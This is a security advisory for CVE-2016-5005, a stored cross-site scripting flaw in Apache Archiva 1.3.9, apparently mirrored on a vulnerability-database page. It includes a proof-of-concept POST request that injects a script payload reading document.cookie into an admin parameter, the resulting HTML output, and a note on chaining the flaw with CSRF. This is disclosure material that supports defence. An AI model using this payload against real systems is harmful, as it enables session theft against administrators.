Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apache Archiva 1.3.9 Cross Site Scripting

🗓️ 12 Jul 2016 00:00:00Reported by Julien AhrensType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 43 Views

Apache Archiva 1.3.9 Cross Site Scripting CVE-2016-5005 RCE Security Advisor

Related
Code
`RCE Security Advisory  
https://www.rcesecurity.com  
  
  
1. ADVISORY INFORMATION  
=======================  
Product: Apache Archiva  
Vendor URL: https://archiva.apache.org  
Type: Cross-Site Scripting [CWE-79]  
Date found: 2016-05-31  
Date published: 2016-07-11  
CVSSv3 Score: 5.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)  
CVE: CVE-2016-5005  
  
  
2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.  
  
  
3. VERSIONS AFFECTED  
====================  
Apache Archiva v1.3.9  
older versions may be affected too.  
  
  
4. INTRODUCTION  
===============  
Apache Archiva™ is an extensible repository management software that helps  
taking care of your own personal or enterprise-wide build artifact  
repository. It is the perfect companion for build tools such as Maven,  
Continuum, and ANT.  
  
(from the vendor's homepage)  
  
  
5. VULNERABILITY DETAILS  
========================  
The script "/archiva/admin/addProxyConnector_commit.action" is vulnerable to  
an authenticated persistent Cross-Site Scripting vulnerability when user-  
supplied input to the HTTP POST parameter "connector.sourceRepoId" is  
processed by the web application. Since the application does not properly  
validate and sanitize this parameter, it is possible to place arbitrary  
script code permanently on the "Administration - Proxy Connectors" page as  
well as on the "Admin: Delete Proxy Connector" page.  
  
The following Proof-of-Concept triggers this vulnerability and adds a new  
proxy connector called "XSS<script>alert(document.cookie)</script>":  
  
POST /archiva/admin/addProxyConnector_commit.action HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101  
Firefox/46.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Cookie: JSESSIONID=1vabu6a1f9wye;  
rbkSignon=7574033ea6d44b4a9722cfa53a7b4001;  
_ga=GA1.2.1956020753.1461333249;  
__utma=86544839.1956020753.1461333249.1461575160.1461575160.1;  
__utmz=86544839.1461575160.1.1.utmcsr=premium_main|utmccn=(not%20set)|utmcmd=(not%20set)  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 567  
  
pattern=&connector.order=0&connector.proxyId=%28direct+connection%29&connector.sourceRepoId=XSS<script>alert(document.cookie)</script>&connector.targetRepoId=com.springsource.repository.bundles.external&connector.policies%5B%27propagate-errors-on-update%27%5D=always&connector.policies%5B%27cache-failures%27%5D=no&connector.policies%5B%27releases%27%5D=always&connector.policies%5B%27propagate-errors%27%5D=stop&connector.policies%5B%27checksum%27%5D=fail&connector.policies%5B%27snapshots%27%5D=always&propertyKey=&propertyValue=&blackListPattern=&whiteListPattern=  
  
The payload is then reflected on the "Administration - Proxy Connectors":  
  
<div class="managedRepo">  
<img src="/archiva/images/archiva-splat-32.gif">  
<p class="id">XSS<script>alert(document.cookie)</script></p>  
<p class="name"></p>  
</div>  
  
And on the "Admin: Delete Proxy Connector" page:  
  
<p>  
Are you sure you want to delete proxy connector <code>[  
XSS<script>alert(document.cookie)</script> ,  
maven2-repository.dev.java.net ]</code> ?  
</p>  
  
  
6. RISK  
=======  
To successfully exploit this vulnerability, a user with administrative  
rights must trick another authenticated user with administrative rights  
to visit one of the affected pages. Since this scenario is quite unlikely,  
the attack likelihood can be increased by combining this vulnerability  
with the Cross-Site Request Forgery vulnerability as described in  
RCESEC-2016-003 (CVE-2016-4469).  
  
The vulnerability allows remote attackers to permanently embed arbitrary  
script code into the context of the Apache Archiva administrative backend  
interface, which offers a wide range of possible attacks such as stealing  
cookies or attacking the browser and its components of a user visiting the  
page.  
  
  
7. SOLUTION  
===========  
Upgrade/Migrate to Apache Archiva 2.2.1  
  
  
8. REPORT TIMELINE  
==================  
2016-05-31: Discovery of the vulnerability  
2016-05-31: Notified vendor via public security mail address  
2016-06-06: No response, sent out another notification  
2016-06-10: Vendor states that this version is out of support  
2016-07-07: Vendor assigns CVE-2016-5005  
2016-07-11: Advisory released  
  
  
9. REFERENCES  
=============  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5005  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Jul 2016 00:00Current
6.8Medium risk
Vulners AI Score6.8
EPSS0.00798
apache archivacross-site scriptingcve-2016-5005rce securityvulnerabilityadministrationpersistence
43